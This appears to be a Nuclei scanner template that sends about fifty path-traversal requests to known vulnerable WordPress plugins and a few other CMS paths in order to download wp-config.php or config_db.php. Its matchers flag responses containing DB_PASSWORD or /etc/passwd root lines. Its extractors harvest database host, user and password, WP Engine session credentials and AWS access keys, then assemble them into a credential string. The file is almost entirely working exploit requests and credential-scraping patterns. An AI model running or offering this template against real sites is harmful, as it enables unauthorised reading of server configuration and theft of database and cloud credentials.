id: wp-plugins
info:
  name: WordPress_Multiple_plugins_-download.php_Arbitrary_File_Download
  author: nucleixivanovich
  description: Vuln in multiple plugins for read wp-config.php
  reference: https://neal.fun/
  severity: high

requests:
  - method: GET
    path:
      - '{{BaseURL}}//wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/image-export/download.php?file=../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/history-collection/download.php?var=../../../wp-config.php'
      - '{{BaseURL}}//wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php'  
      - '{{BaseURL}}//wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php'
      - '{{BaseURL}}//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes'
      - '{{BaseURL}}//wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php'
      - '{{BaseURL}}//wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php\x00'
      - '{{BaseURL}}//wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=http://{{BaseURL}}/wp-config.php'  
      - '{{BaseURL}}//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes' 
      - '{{BaseURL}}//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'            
      - '{{BaseURL}}///wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'   
      - '{{BaseURL}}//blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'              
      - '{{BaseURL}}//wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php' 
      - '{{BaseURL}}//wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php'   
      - '{{BaseURL}}//wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'    
      - '{{BaseURL}}//?aam-media=wp-config.php'     
      - '{{BaseURL}}//wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php'           
      - "{{BaseURL}}//wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=../../../wp-config.php"      
      - '{{BaseURL}}//wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'     
      - '{{BaseURL}}//wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'       
      - '{{BaseURL}}//wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php'      
      - "{{BaseURL}}//wp-content/plugins/ungallery/source_editf3.php?pic=../../../../../wp-config.php"
      - '{{BaseURL}}//wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php'      
      - '{{BaseURL}}//wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'  
      - "{{BaseURL}}//wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"      
      - "{{BaseURL}}//wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
      - "{{BaseURL}}//wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php"  
      - "{{BaseURL}}//wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php"            
      - '{{BaseURL}}//wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php'          
      - '{{BaseURL}}//wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00'                
      #
      - "{{BaseURL}}//wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php"
      - "{{BaseURL}}//wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download"
      - "{{BaseURL}}//wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"
      - "{{BaseURL}}//wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php"
      - '{{BaseURL}}//wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'      

#      - "{{BaseURL}}//wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
#      - "{{BaseURL}}//wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"

      - '{{BaseURL}}//include/thumb.php?x=1&y=/../../../config&dir=config_db.php'      
      - '{{BaseURL}}//include/thumb.php?dir=http\..\..\config\config_db.php'
      - '{{BaseURL}}//member/index.php?a=doshow&m=include&c=old_thumb&dir=http/./.../..././/./.../..././/config/config_db.php'  

    stop-at-first-match: true

    matchers-condition: or    
    matchers:
      - type: dsl
        dsl:
        - status_code==200 && contains(body,"WPENGINE_ACCOUNT")
        - status_code==200 && contains(body,"DB_PASSWORD")
        - status_code==200 && contains(body,"DB_PASS")
        - status_code==200 && contains(body,"PASSWD")
        - status_code==200 && contains(body,"db_pwd")
        - status_code==200 && contains(body,"define(")        
        - status_code==200 && contains(body,'/** MySQL database username */') && contains(body,'define(')        
        - status_code==200 && contains(body,"<?php") && contains(body,"con_db_host") && contains(body,"con_db_name")
        - status_code==200 && contains(body,"con_db_host")
        - status_code==200 && contains(body,"con_db_id") && contains(body,"con_db_name")          
        condition: or        

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"
        condition: or

  #===EXTRACT-PART===#

    extractors:
      - type: regex
        part: body
        name: db_host        
        group: 6
        internal: true
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(HOST|HOSTNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_name        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(NAME|DATABASE)['\"](.*?).*?['\"](.*?)['\"]"          
      - type: regex
        part: body
        name: db_user        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(USER|USERNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_password        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(PASS|PASSWORD)['\"](.*?).*?['\"](.*?)['\"]"

      - type: regex
        part: body
        name: db_host
        group: 1  
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_HOST\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_user
        group: 1
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_USERNAME\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_password
        group: 1
        internal: true
        regex:   
          - "(?mi)['\"]WPENGINE_SESSION_DB_PASSWORD\\s*['\"][=:]['\"]\\s*(.*?)\\,"             

      - type: regex
        part: body
        name: aws_key
        regex:
          - "((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"

      - type: regex
        part: body
        name: aws_key1
        regex:
          - (?i)(['\"]access-key-id['\"]\\s*=>\\s*['\"](AKIA[0-9A-Z]{16})['\"]|['\"]secret-access-key['\"]\\s*=>\\s*['\"]([A-Za-z0-9\/+]{40})['\"])


      - type: dsl  # type of the extractor
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + "3306" + "|DB_USERNAME=" + db_user + "|DB_PASSWORD=" + db_password'

      - type: dsl
        name: db_original
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USERNAME=" +  db_user + "|DB_PASSWORD=" + db_password'